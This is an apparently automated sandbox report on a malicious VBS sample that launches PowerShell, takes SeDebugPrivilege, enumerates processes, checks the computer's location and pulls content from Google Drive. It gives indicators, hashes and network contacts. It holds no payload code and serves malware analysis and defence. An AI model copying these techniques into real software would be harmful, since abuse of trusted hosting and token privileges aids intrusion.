Malware Analysis Report

2025-08-10 21:50

Sample ID 240608-h4smqaab3t
Target dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs
SHA256 dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde
Score 8/10

Analysis Overview

Score 8/10

SHA256 dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde

Threat Level: Likely malicious

The file dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs was found to be: Likely malicious.

Malicious Activity Summary


Blocklisted process makes network request

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-08 07:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-08 07:17

Reported

2024-06-08 07:20

Platform

win7-20240419-en

Max time kernel

119s

Max time network

119s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

MD5 19c2705572794894cfb99f2e8a39e54a
SHA1 bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c
SHA256 24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99
SHA512 7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-08 07:17

Reported

2024-06-08 07:20

Platform

win10v2004-20240508-en

Max time kernel

93s

Max time network

95s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\dbaf0103b94b49370b87cfdf0feb19811e3373da314b065d8068fab0bc003fde.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Camphorate.Int && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.179.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 172.217.20.161:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 161.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 78.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Copolymerise.txt

MD5 19c2705572794894cfb99f2e8a39e54a
SHA1 bbb7ed43de4aa50aaee18cfa4cfb9e00ec834d5c
SHA256 24a1748ccda00bef2a8f1ad7a464a30d9215a04e72710dd8ce1e8b3c7ee90c99
SHA512 7dd8667ca72a4400dc245736f7fd712f85cf5a5459c06f706f6a320f79f8b6696ded2d7f97c79b1957fcf6f442b8a65fc7134b123d64ea732fd65853cf29c1df

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0sxdlstl.5lr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
